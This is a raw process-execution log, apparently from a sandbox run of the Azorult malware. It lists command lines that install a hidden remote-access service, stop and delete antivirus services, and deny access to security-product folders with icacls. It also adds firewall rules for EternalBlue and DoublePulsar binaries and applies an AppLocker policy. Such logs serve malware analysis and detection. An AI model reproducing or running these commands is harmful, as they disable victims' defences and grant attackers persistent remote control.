"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --always-read-main-dll --field-trial-handle=3724,i,2472183134824798889,14929192463046964975,262144 --variations-seed-version --mojo-platform-channel-handle=3592 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-US --service-sandbox-type=collections --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6520,i,2472183134824798889,14929192463046964975,262144 --variations-seed-version --mojo-platform-channel-handle=6764 /prefetch:14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --always-read-main-dll --field-trial-handle=6232,i,2472183134824798889,14929192463046964975,262144 --variations-seed-version --mojo-platform-channel-handle=6280 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --always-read-main-dll --field-trial-handle=5804,i,2472183134824798889,14929192463046964975,262144 --variations-seed-version --mojo-platform-channel-handle=7040 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6312,i,2472183134824798889,14929192463046964975,262144 --variations-seed-version --mojo-platform-channel-handle=5436 /prefetch:14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4632,i,2472183134824798889,14929192463046964975,262144 --variations-seed-version --mojo-platform-channel-handle=7096 /prefetch:14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6440,i,2472183134824798889,14929192463046964975,262144 --variations-seed-version --mojo-platform-channel-handle=6484 /prefetch:14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --always-read-main-dll --field-trial-handle=7152,i,2472183134824798889,14929192463046964975,262144 --variations-seed-version --mojo-platform-channel-handle=6476 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3476,i,2472183134824798889,14929192463046964975,262144 --variations-seed-version --mojo-platform-channel-handle=7484 /prefetch:14
C:\Users\Admin\Downloads\Azorult.exe
"C:\Users\Admin\Downloads\Azorult.exe"
C:\ProgramData\Microsoft\Intel\wini.exe
C:\ProgramData\Microsoft\Intel\wini.exe -pnaxui
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\install.vbs"
C:\ProgramData\Windows\winit.exe
"C:\ProgramData\Windows\winit.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Programdata\Windows\install.bat" "
C:\Windows\SysWOW64\regedit.exe
regedit /s "reg1.reg"
C:\Windows\SysWOW64\regedit.exe
regedit /s "reg2.reg"
C:\Windows\SysWOW64\timeout.exe
timeout 2
C:\ProgramData\Windows\rutserv.exe
rutserv.exe /silentinstall
C:\ProgramData\Windows\rutserv.exe
rutserv.exe /firewall
C:\ProgramData\Windows\rutserv.exe
rutserv.exe /start
C:\ProgramData\Windows\rutserv.exe
C:\ProgramData\Windows\rutserv.exe
C:\programdata\install\cheat.exe
C:\programdata\install\cheat.exe -pnaxui
C:\ProgramData\Windows\rfusclient.exe
C:\ProgramData\Windows\rfusclient.exe
C:\ProgramData\Windows\rfusclient.exe
C:\ProgramData\Windows\rfusclient.exe /tray
C:\Windows\SysWOW64\attrib.exe
ATTRIB +H +S C:\Programdata\Windows\*.*
C:\programdata\install\ink.exe
C:\programdata\install\ink.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc start appidsvc
C:\Windows\SysWOW64\sc.exe
sc start appidsvc
C:\Windows\SysWOW64\attrib.exe
ATTRIB +H +S C:\Programdata\Windows
C:\Windows\SysWOW64\sc.exe
sc failure RManService reset= 0 actions= restart/1000/restart/1000/restart/1000
C:\ProgramData\Microsoft\Intel\taskhost.exe
"C:\ProgramData\Microsoft\Intel\taskhost.exe"
C:\Windows\SysWOW64\sc.exe
sc config RManService obj= LocalSystem type= interact type= own
C:\Windows\SysWOW64\sc.exe
sc config RManService DisplayName= "Microsoft Framework"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc start appmgmt
C:\programdata\microsoft\intel\P.exe
C:\programdata\microsoft\intel\P.exe
C:\Windows\SysWOW64\sc.exe
sc start appmgmt
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc config appidsvc start= auto
C:\Windows\SysWOW64\sc.exe
sc config appidsvc start= auto
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc config appmgmt start= auto
C:\Windows\SysWOW64\sc.exe
sc config appmgmt start= auto
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete swprv
C:\Windows\SysWOW64\sc.exe
sc delete swprv
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop mbamservice
C:\Windows\SysWOW64\sc.exe
sc stop mbamservice
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop bytefenceservice
C:\Windows\SysWOW64\sc.exe
sc stop bytefenceservice
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete bytefenceservice
C:\Windows\SysWOW64\sc.exe
sc delete bytefenceservice
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete mbamservice
C:\Windows\SysWOW64\sc.exe
sc delete mbamservice
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete crmsvc
C:\Windows\SysWOW64\sc.exe
sc delete crmsvc
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete "windows node"
C:\Windows\SysWOW64\sc.exe
sc delete "windows node"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop Adobeflashplayer
C:\Windows\SysWOW64\sc.exe
sc stop Adobeflashplayer
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete AdobeFlashPlayer
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop MoonTitle
C:\Windows\SysWOW64\sc.exe
sc delete AdobeFlashPlayer
C:\Windows\SysWOW64\sc.exe
sc stop MoonTitle
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete MoonTitle"
C:\Windows\SysWOW64\sc.exe
sc delete MoonTitle"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop AudioServer
C:\Windows\SysWOW64\sc.exe
sc stop AudioServer
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete AudioServer"
C:\Windows\SysWOW64\sc.exe
sc delete AudioServer"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Programdata\Install\del.bat
C:\Windows\SysWOW64\timeout.exe
timeout 5
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop clr_optimization_v4.0.30318_64
C:\Windows\SysWOW64\sc.exe
sc stop clr_optimization_v4.0.30318_64
C:\ProgramData\Windows\rfusclient.exe
C:\ProgramData\Windows\rfusclient.exe /tray
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete clr_optimization_v4.0.30318_64"
C:\Windows\SysWOW64\sc.exe
sc delete clr_optimization_v4.0.30318_64"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop MicrosoftMysql
C:\Windows\SysWOW64\sc.exe
sc stop MicrosoftMysql
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete MicrosoftMysql
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state on
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7688,i,2472183134824798889,14929192463046964975,262144 --variations-seed-version --mojo-platform-channel-handle=7556 /prefetch:14
C:\Windows\SysWOW64\sc.exe
sc delete MicrosoftMysql
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall set allprofiles state on
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\Microsoft JDX" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7612,i,2472183134824798889,14929192463046964975,262144 --variations-seed-version --mojo-platform-channel-handle=7624 /prefetch:14
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Windows\svchost.exe" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Windows\svchost.exe" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\svchost.exe" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\svchost.exe" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\Fonts\Mysql" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny %username%:(OI)(CI)(F)
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\icacls.exe
icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Windows\speechstracing /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\Zaxar" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "c:\program files\Internet Explorer\bin" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny %username%:(F)
C:\Windows\SysWOW64\icacls.exe
icacls c:\programdata\Malwarebytes /deny Admin:(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\icacls.exe
icacls c:\programdata\Malwarebytes /deny System:(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny %username%:(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Programdata\MB3Install /deny Admin:(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Programdata\MB3Install /deny System:(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Programdata\Indus /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Programdata\Driver Foundation Visions VHG" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\AdwCleaner /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\AdwCleaner /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\ByteFence" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\KVRT_Data /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\360" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\360safe" /deny Admin:(OI)(CI)(F)
C:\programdata\microsoft\intel\R8.exe
C:\programdata\microsoft\intel\R8.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\SpyHunter" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\rdp\run.vbs"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\rdp\pause.bat" "
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Rar.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Rar.exe
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Malwarebytes" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\timeout.exe
timeout 3
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\COMODO" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Enigma Software Group" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\SpyHunter" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\AVAST Software" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\AVAST Software" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny %username%:(OI)(CI)(F)
C:\ProgramData\Microsoft\Intel\winlog.exe
C:\ProgramData\Microsoft\Intel\winlog.exe -p123
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Programdata\AVAST Software" /deny Admin:(OI)(CI)(F)
C:\ProgramData\Microsoft\Intel\winlogon.exe
"C:\ProgramData\Microsoft\Intel\winlogon.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\AVG" /deny Admin:(OI)(CI)(F)
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\B60C.tmp\B60D.bat C:\ProgramData\Microsoft\Intel\winlogon.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PowerShell.exe -command "Import-Module applocker" ; "Set-AppLockerPolicy -XMLPolicy C:\ProgramData\microsoft\Temp\5.xml"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
